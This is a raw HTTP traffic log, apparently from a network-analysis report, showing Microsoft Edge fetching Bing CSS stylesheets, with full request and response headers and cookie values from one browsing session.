bm_sv=0DEC9B29819DC3ABBF8D0CF2C33AC1E4~YAAQvXd7XCEc4kqSAQAAFhluXRkP3pHPMOMJR8xpE6m40xBEGZQq9h4J17KsvtYhfIc9MmSdHop+L8bNS+ikk5gbznoaPhCHGPEZ1UD4XiyZ4hiflICrg8RdI+KbBt2Ez4Eg4mzoB9LO8ADVCgLg1G4+xyOqIe08zfgSjNHhzLE30HtXgDvuzGdF39DTkqNMffb/ktSk3iWjaL1R5ar1Hck7Xg/Lvc8poGQ0dpWICy7igeDOJD4oxSEyTdZ/AA==~1

Response

HTTP/1.1 200 OK

Content-Length: 395
Content-Type: text/css; charset=utf-8
Content-Encoding: br
Content-MD5: 7QcwCYdewOqKiakemN+HIw==
Last-Modified: Fri, 13 Sep 2024 14:55:50 GMT
ETag: 0x8DCD40428CACDFF
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: d310c430-001e-005e-68fc-10ef4c000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Access-Control-Allow-Origin: *
Cache-Control: public, no-transform, max-age=131960
Expires: Mon, 07 Oct 2024 04:45:09 GMT
Date: Sat, 05 Oct 2024 16:05:49 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.a4777b5c.1728144349.f099c1a
Timing-Allow-Origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/rcJx5DodqqK-wxOI4K71tEgPVuE.br.css

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rp/rcJx5DodqqK-wxOI4K71tEgPVuE.br.css HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: text/css,*/*;q=0.1
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: style
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_V=1; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; SRCHUSR=DOB=20241005&T=1728144325000; _C_ETH=1; _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:32.8363002+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _Rwho=u=d&ts=2024-10-05; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=3&RB=0&GB=0&RG=200&RP=0; USRLOC=HS=1&BLOCK=TS=241005160532; SRCHHPGUSR=SRCHLANG=en&HV=1728144332&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=498&DPR=1.0&UTC=0&PV=10.0; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl; ipv6=hit=1728147938444&t=4; bm_sv=0DEC9B29819DC3ABBF8D0CF2C33AC1E4~YAAQvXd7XCEc4kqSAQAAFhluXRkP3pHPMOMJR8xpE6m40xBEGZQq9h4J17KsvtYhfIc9MmSdHop+L8bNS+ikk5gbznoaPhCHGPEZ1UD4XiyZ4hiflICrg8RdI+KbBt2Ez4Eg4mzoB9LO8ADVCgLg1G4+xyOqIe08zfgSjNHhzLE30HtXgDvuzGdF39DTkqNMffb/ktSk3iWjaL1R5ar1Hck7Xg/Lvc8poGQ0dpWICy7igeDOJD4oxSEyTdZ/AA==~1

Response

HTTP/1.1 200 OK

Content-Length: 114
Content-Type: text/css; charset=utf-8
Content-Encoding: br
Content-MD5: +pMZ3zDO5fQi8OwDnJk2Sg==
Last-Modified: Wed, 17 Aug 2022 06:51:45 GMT
ETag: 0x8DA801CF34C96C1
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: f7d1f34d-101e-0038-08ab-eb4491000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Access-Control-Allow-Origin: *
Cache-Control: public, no-transform, max-age=60163
Expires: Sun, 06 Oct 2024 08:48:32 GMT
Date: Sat, 05 Oct 2024 16:05:49 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.a4777b5c.1728144349.f0a1ed6
Timing-Allow-Origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/J1CAvwnxXsmWnvoGjOAm14DdNQE.br.css

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rp/J1CAvwnxXsmWnvoGjOAm14DdNQE.br.css HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: text/css,*/*;q=0.1
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: style
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_V=1; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; SRCHUSR=DOB=20241005&T=1728144325000; _C_ETH=1; _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:32.8363002+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _Rwho=u=d&ts=2024-10-05; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=3&RB=0&GB=0&RG=200&RP=0; USRLOC=HS=1&BLOCK=TS=241005160532; SRCHHPGUSR=SRCHLANG=en&HV=1728144332&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=498&DPR=1.0&UTC=0&PV=10.0; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl; ipv6=hit=1728147938444&t=4; bm_sv=0DEC9B29819DC3ABBF8D0CF2C33AC1E4~YAAQvXd7XCEc4kqSAQAAFhluXRkP3pHPMOMJR8xpE6m40xBEGZQq9h4J17KsvtYhfIc9MmSdHop+L8bNS+ikk5gbznoaPhCHGPEZ1UD4XiyZ4hiflICrg8RdI+KbBt2Ez4Eg4mzoB9LO8ADVCgLg1G4+xyOqIe08zfgSjNHhzLE30HtXgDvuzGdF39DTkqNMffb/ktSk3iWjaL1R5ar1Hck7Xg/Lvc8poGQ0dpWICy7igeDOJD4oxSEyTdZ/AA==~1

Response

HTTP/1.1 200 OK

Content-Length: 83
Content-Type: text/css; charset=utf-8
Content-Encoding: br
Content-MD5: dOaojddlxRWmkOx9C+Rq8g==
Last-Modified: Wed, 20 Mar 2024 11:04:47 GMT
ETag: 0x8DC48CD8E548E8C
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 4de09aa3-101e-00a6-5a3a-05b3b2000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Access-Control-Allow-Origin: *
Cache-Control: public, no-transform, max-age=79561
Expires: Sun, 06 Oct 2024 14:11:50 GMT
Date: Sat, 05 Oct 2024 16:05:49 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.a4777b5c.1728144349.f0a1ffd
Timing-Allow-Origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/g8RFvmgwpBLY15PHz6aDHrBdIok.br.css

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rp/g8RFvmgwpBLY15PHz6aDHrBdIok.br.css HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: text/css,*/*;q=0.1
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: style
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_V=1; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; SRCHUSR=DOB=20241005&T=1728144325000; _C_ETH=1; _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:32.8363002+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _Rwho=u=d&ts=2024-10-05; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=3&RB=0&GB=0&RG=200&RP=0; USRLOC=HS=1&BLOCK=TS=241005160532; SRCHHPGUSR=SRCHLANG=en&HV=1728144332&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=498&DPR=1.0&UTC=0&PV=10.0; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl; ipv6=hit=1728147938444&t=4; bm_sv=0DEC9B29819DC3ABBF8D0CF2C33AC1E4~YAAQvXd7XCEc4kqSAQAAFhluXRkP3pHPMOMJR8xpE6m40xBEGZQq9h4J17KsvtYhfIc9MmSdHop+L8bNS+ikk5gbznoaPhCHGPEZ1UD4XiyZ4hiflICrg8RdI+KbBt2Ez4Eg4mzoB9LO8ADVCgLg1G4+xyOqIe08zfgSjNHhzLE30HtXgDvuzGdF39DTkqNMffb/ktSk3iWjaL1R5ar1Hck7Xg/Lvc8poGQ0dpWICy7igeDOJD4oxSEyTdZ/AA==~1

Response

HTTP/1.1 200 OK

Content-Length: 205
Content-Type: text/css
Content-Encoding: br
Content-MD5: 5E78SH0rHLWsc4ce7O3UkQ==
Last-Modified: Tue, 24 Sep 2024 06:47:07 GMT
ETag: 0x8DCDC64B565CAD8
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: a0c86e57-201e-006b-6a1c-15b7c6000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Access-Control-Allow-Origin: *
Akamai-GRN: 0.521a1202.1727935777.c0bba9b1
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
Cache-Control: public, no-transform, max-age=196813
Expires: Mon, 07 Oct 2024 22:46:03 GMT
Date: Sat, 05 Oct 2024 16:05:50 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.a4777b5c.1728144350.f0a2163
Timing-Allow-Origin: *
GET

https://r.bing.com/rp/7lB-jK27Dd3_t3kGC3OY6DU6Cek.br.css

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rp/7lB-jK27Dd3_t3kGC3OY6DU6Cek.br.css HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: text/css,*/*;q=0.1
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: style
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_V=1; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; SRCHUSR=DOB=20241005&T=1728144325000; _C_ETH=1; _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:32.8363002+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _Rwho=u=d&ts=2024-10-05; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=3&RB=0&GB=0&RG=200&RP=0; USRLOC=HS=1&BLOCK=TS=241005160532; SRCHHPGUSR=SRCHLANG=en&HV=1728144332&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=498&DPR=1.0&UTC=0&PV=10.0; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl; ipv6=hit=1728147938444&t=4; bm_sv=0DEC9B29819DC3ABBF8D0CF2C33AC1E4~YAAQvXd7XCEc4kqSAQAAFhluXRkP3pHPMOMJR8xpE6m40xBEGZQq9h4J17KsvtYhfIc9MmSdHop+L8bNS+ikk5gbznoaPhCHGPEZ1UD4XiyZ4hiflICrg8RdI+KbBt2Ez4Eg4mzoB9LO8ADVCgLg1G4+xyOqIe08zfgSjNHhzLE30HtXgDvuzGdF39DTkqNMffb/ktSk3iWjaL1R5ar1Hck7Xg/Lvc8poGQ0dpWICy7igeDOJD4oxSEyTdZ/AA==~1

Response

HTTP/1.1 200 OK

Content-Length: 96
Content-Type: text/css
Content-Encoding: br
Content-MD5: cJ0FE4QAAV1kIu4JbJqx1g==
Last-Modified: Tue, 24 Sep 2024 05:52:01 GMT
ETag: 0x8DCDC5D02E8902A
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 460ab36a-401e-003f-03fa-155d4c000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Access-Control-Allow-Origin: *
Cache-Control: public, no-transform, max-age=292108
Expires: Wed, 09 Oct 2024 01:14:18 GMT
Date: Sat, 05 Oct 2024 16:05:50 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.a4777b5c.1728144350.f0a230c
Timing-Allow-Origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/dliRwIxSaWxw-rZZkpFj-NPxBOA.br.css

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rp/dliRwIxSaWxw-rZZkpFj-NPxBOA.br.css HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: text/css,*/*;q=0.1
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: style
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA; _EDGE_V=1; USRLOC=HS=1; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; SRCHUSR=DOB=20241005; SRCHHPGUSR=SRCHLANG=en; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=

Response

HTTP/1.1 200 OK

Content-Type: text/css
Content-MD5: 5ui94BGfQj5MuJRtm7wr9Q==
Last-Modified: Tue, 24 Sep 2024 06:43:41 GMT
ETag: 0x8DCDC643AB18727
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 0ae17ef4-301e-0030-5459-15b0ba000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Access-Control-Allow-Origin: *
Content-Encoding: gzip
Content-Length: 195
Vary: Accept-Encoding
Akamai-GRN: 0.88777b5c.1728058410.7dc5eba
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
Cache-Control: public, no-transform, max-age=222711
Expires: Tue, 08 Oct 2024 05:57:20 GMT
Date: Sat, 05 Oct 2024 16:05:29 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.a4777b5c.1728144329.f097300
Timing-Allow-Origin: *
GET

https://r.bing.com/rb/5U/cir3,cc,nc/x1GLwX6TA4Cg3KdvDSl85rMun2Q.css?bu=Bm9v_BKzFNAWbw&or=w

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rb/5U/cir3,cc,nc/x1GLwX6TA4Cg3KdvDSl85rMun2Q.css?bu=Bm9v_BKzFNAWbw&or=w HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: text/css,*/*;q=0.1
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: style
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA; _EDGE_V=1; USRLOC=HS=1; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; SRCHUSR=DOB=20241005; SRCHHPGUSR=SRCHLANG=en; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=

Response

HTTP/1.1 200 OK

Content-Length: 917
Content-Type: text/css; charset=utf-8
Server: Kestrel
Access-Control-Allow-Headers: *
Access-Control-Allow-Origin: *
Content-Encoding: br
Last-Modified: Sat, 02 Oct 2010 09:51:22 GMT
X-EventID: 66fe4e358f134b74b20c0fb8ee38b3fb
Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, ECT, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
UserAgentReductionOptOut: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
X-AS-InstrumentationOptions: AppServerLoggingMaster=1
X-AS-MACHINENAME: DUBEEAP0000E147
X-AS-SuppressSetCookie: 1
Content-Security-Policy-Report-Only: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-HZS1Vrxua0YbwQxvS82GoAadF0AZbqbteZU5dvpUBoU='; base-uri 'self';report-to csp-endpoint
Report-To: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingrms"}]}
cross-origin-resource-policy: cross-origin
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.75}
Cache-Control: public, max-age=229755
Expires: Tue, 08 Oct 2024 07:54:44 GMT
Date: Sat, 05 Oct 2024 16:05:29 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.a4777b5c.1728144329.f09731e
Timing-Allow-Origin: *
GET

https://r.bing.com/rp/sS9WdiLA9F38WKJqRP3fX-VP9Lo.br.css

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rp/sS9WdiLA9F38WKJqRP3fX-VP9Lo.br.css HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: text/css,*/*;q=0.1
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: style
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
